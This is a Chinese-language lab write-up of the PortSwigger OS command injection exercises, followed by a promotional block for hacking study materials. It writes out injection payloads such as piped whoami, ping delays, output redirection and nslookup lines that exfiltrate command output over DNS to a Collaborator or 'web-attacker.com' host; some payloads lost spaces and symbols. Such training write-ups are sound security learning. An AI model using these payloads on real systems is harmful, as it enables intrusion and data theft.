burp靶场--操作系统命令注入
发布时间:2026/9/10 22:19:22 作者:尧图编辑部 阅读量:1,286

burp靶场–操作系统命令注入https://portswigger.net/web-security/os-command-injection#what-is-os-command-injection1.操作系统命令注入操作系统命令注入也称为 shell 注入。它允许攻击者在运行应用程序的服务器上执行操作系统 (OS) 命令通常会完全破坏应用程序及其数据。通常攻击者可以利用操作系统命令注入漏洞来危害托管基础设施的其他部分并利用信任关系将攻击转向组织内的其他系统。实验1操作系统命令注入简单案例### 使用要求 该实验室的产品库存检查器中 存在操作系统命令注入漏洞。 应用程序执行包含用户提供的产品和商店 ID 的 shell 命令并在响应中返回命令的原始输出。 要解决本实验请执行whoami命令以确定当前用户的名称。 ### 实验操作 使用 Burp Suite 拦截并修改检查库存水平的请求。 修改storeID参数为其指定值1|whoami。 请注意响应包含当前用户的名称。实验2带时间延迟的操作系统盲命令注入### 实验要求 该实验室在反馈功能中 包含操作系统盲命令注入漏洞。 应用程序执行包含用户提供的详细信息的 shell 命令。命令的输出不会在响应中返回。 为了解决这个实验室问题利用操作系统盲命令注入漏洞造成 10 秒的延迟。 ### 实验操作 使用Burp Suite拦截并修改提交反馈的请求。 修改email参数改为 emailx||ping-c10127.0.0.1|| 请注意响应需要 10 秒才能返回。实验3具有输出重定向的盲操作系统命令注入### 实验要求 该实验室在反馈功能中 包含操作系统盲命令注入漏洞。 应用程序执行包含用户提供的详细信息的 shell 命令。命令的输出不会在响应中返回。但是您可以使用输出重定向来捕获命令的输出。有一个可写文件夹 /var/www/images/ 应用程序从此位置提供产品目录的图像。您可以将注入命令的输出重定向到此文件夹中的文件然后使用图像加载 URL 检索文件的内容。 要解决该实验请执行whoami命令并检索输出。 ### 实验操作 使用Burp Suite拦截并修改提交反馈的请求。 修改email参数改为 email||whoami/var/www/images/output.txt|| 现在使用 Burp Suite 拦截并修改加载产品图像的请求。 修改filename参数将值更改为您为注入命令的输出指定的文件的名称 filenameoutput.txt 观察响应包含注入命令的输出。使用proxy开启拦截一步一步找到查看图像的包查看命令输出结果实验4带外交互的盲操作系统命令注入### 实验要求 该实验室在反馈功能中 包含操作系统盲命令注入漏洞。 应用程序执行包含用户提供的详细信息的 shell 命令。该命令是异步执行的对应用程序的响应没有影响。无法将输出重定向到您可以访问的位置。但是您可以触发与外部域的带外交互。 要解决该实验室问题请利用操作系统盲命令注入漏洞向 Burp Collaborator 发出 DNS 查找。 ### 实验操作 使用Burp Suite拦截并修改提交反馈的请求。 修改email参数改为 emailx||nslookupx.BURP-COLLABORATOR-SUBDOMAIN|| 右键单击并选择“插入 Collaborator 负载”以在修改的email参数中指示的位置插入 Burp Collaborator 子域。 ### 5、利用带外OAST技术 1、简述 可以使用一个注入命令该命令将触发与您使用OAST技术控制的系统的带外网络交互。例如 nslookup kgji2ohoyw.web-attacker.com 此有效负载使用nslookup命令对指定的域进行DNS查找。攻击者可以监视指定查找的发生从而检测到命令已成功插入。 2、带外通道还提供了一种从注入命令中提取输出的简单方法 nslookup whoami.kgji2ohoyw.web-attacker.com 这将导致对攻击者的域进行DNS查找该域包含whoami命令 wwwuser.kgji2ohoyw.web-attacker.com ############### ## payloademailx||nslookupx.BURP-COLLABORATOR-SUBDOMAIN|| collaborator生成zil6so7cbkpvszmjvnkp0v2v3m9dx3ls.oastify.com emailx||nslookupwhoami.zil6so7cbkpvszmjvnkp0v2v3m9dx3ls.oastify.com||实验5带外数据泄露的盲操作系统命令注入### 实验要求 该实验室在反馈功能中 包含操作系统盲命令注入漏洞。 应用程序执行包含用户提供的详细信息的 shell 命令。该命令是异步执行的对应用程序的响应没有影响。无法将输出重定向到您可以访问的位置。但是您可以触发与外部域的带外交互。 要完成该实验请执行whoami命令并通过 DNS 查询将输出渗透到 Burp Collaborator。您需要输入当前用户的名称才能完成实验。 ### 实验操作 使用Burp Suite Professional拦截并修改提交反馈的请求。 转到“协作者”选项卡。 单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。 修改email参数将其更改为如下所示但在指示的位置插入您的 Burp Collaborator 子域 emailx||nslookupx.BURP-COLLABORATOR-SUBDOMAIN|| email||nslookupwhoami.BURP-COLLABORATOR-SUBDOMAIN|| 返回“协作者”选项卡然后单击“立即投票”。您应该会看到一些由应用程序发起的作为负载结果的 DNS 交互。如果您没有看到列出的任何交互请等待几秒钟然后重试因为服务器端命令是异步执行的。 请注意命令的输出出现在交互的子域中您可以在“协作者”选项卡中查看该输出。所查找的完整域名显示在交互的“描述”选项卡中。 要完成实验请输入当前用户的名称。参考### 【Burp系列】超全命令执行漏洞实验总结 https://mp.weixin.qq.com/s/CFy93BOGOfh_6Qb5yL6M6w ### payloadallthethings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection ### owasp命令执行 https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection最后关于网络安全技术储备学好网络安全不论是就业还是做副业赚钱都不错但要学会网络安全还是要有一个学习规划。最后大家分享一份全套的网络安全学习资料给那些想学习网络安全的小伙伴们一点帮助对于0基础小白入门如果你是零基础小白想快速入门网络安全是可以考虑的。一方面是学习时间相对较短学习内容更全面更集中。二方面是可以找到适合自己的学习方案包括网安成长学习路线图、SRC黑客文档、护网行动、黑客必读书单、面试题、学习视频等教程。带你从零基础系统性的学好网络安全需要的可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】1.成长路线图学习规划要学习一门新的技术作为新手一定要先学习成长路线图方向不对努力白费。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。2.网安入门到进阶视频教程很多朋友都不喜欢晦涩的文字我也为大家准备了视频教程其中一共有21个章节每个章节都是当前板块的精华浓缩。全套教程文末领取哈3.SRC黑客文档大家最喜欢也是最关心的SRC技术文籍黑客技术也有收录SRC技术文籍黑客资料由于是敏感资源这里不能直接展示哦全套教程文末领取哈4.护网行动资料其中关于HW护网行动也准备了对应的资料这些内容可相当于比赛的金手指5.黑客必读书单随着互联网技术的飞速发展网络安全已经成为了当今科技领域的一大热点。这些SQL注入、CCNA、Web渗透、Linux服务器等以其强大的语言理解和防御能力正在守护着我们网络世界。 那以下这些PDF籍就是非常不错的学习资源。6.网络安全岗面试题合集当你自学到这里你就要开始思考找工作的事情了而工作绕不开的就是真题和面试题。这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】